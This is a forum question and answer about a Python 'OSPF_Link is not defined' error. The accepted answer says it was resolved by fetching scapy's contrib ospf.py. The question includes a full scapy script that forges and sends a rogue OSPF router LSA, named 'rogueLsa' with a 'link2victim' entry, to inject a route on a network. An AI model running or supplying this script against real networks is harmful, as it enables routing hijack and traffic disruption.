# name 'OSPF_Link' is not defined

Tags: python, networking, module, scapy, ospf

I have a python script like this:

```
#!/usr/bin/env python
from scapy.all import *
from ospf import *

def ourSend(packet):
        sendp(packet,iface='eth1')

host1='10.0.3.2'      
advr_routers='10.0.8.7'
host2='10.0.2.2'      
sequence=0x80000918      

link2host1 = OSPF_Link(id=host1,data='10.0.3.1',type=2,metric=1)
link2host2 = OSPF_Link(id=host2,data='10.0.2.2',type=2,metric=1)
link2victim = OSPF_Link(id="192.168.200.20",data="255.255.255.255",type=3,metric=1)

IPlayer=IP(src='10.0.1.2',dst='224.0.0.5')
OSPFHdr=OSPF_Hdr(src='10.0.6.1')
rogueLsa=Ether()/IPlayer/OSPFHdr/OSPF_LSUpd(lsacount=1,lsalist=[OSPF_Router_LSA(options=0x22,id='10.0.3.1',adrouter=advr_routers,seq=sequence,\
                                            linkcount=3,linklist=[link2victim,link2host1,link2host2])])

ourSend(rogueLsa)
```

When I run it it has an scapy error.. So I resolved it with git [pyrt](https://github.com/mor1/pyrt)...

now when I want to run the python script I have other error:

```
$ python scipt.py
WARNING: No route found for IPv6 destination :: (no default route?)
Traceback (most recent call last):
  File "s.py", line 19, in <module>
    link2host1 = OSPF_Link(id=host1,data='10.0.3.1',type=2,metric=1)
NameError: name 'OSPF_Link' is not defined
```

Thank you

Comment: Are you sure `OSPF_Link()` method exists at `ospf` as a method?

Comment: How can be sure in this case? Thank you

Comment: `OSPF_Link` is not defined i'm guessing you are trying to import it from `ospf` module, Just look at `ospf` code to see if it's there.

Comment: Please check [this link](https://github.com/mor1/pyrt).. It doesn't exist

Answer (score 0, accepted):

I Should separately get [ospf.py](https://raw.githubusercontent.com/d1b/scapy/master/scapy/contrib/ospf.py) **again** and run my script.

This is what I tried and worked...

When you git **[pyrt](https://github.com/mor1/pyrt)** The module **`OSPF_Link`** can't be added. SO I used the ospf.py again and problem is solved now....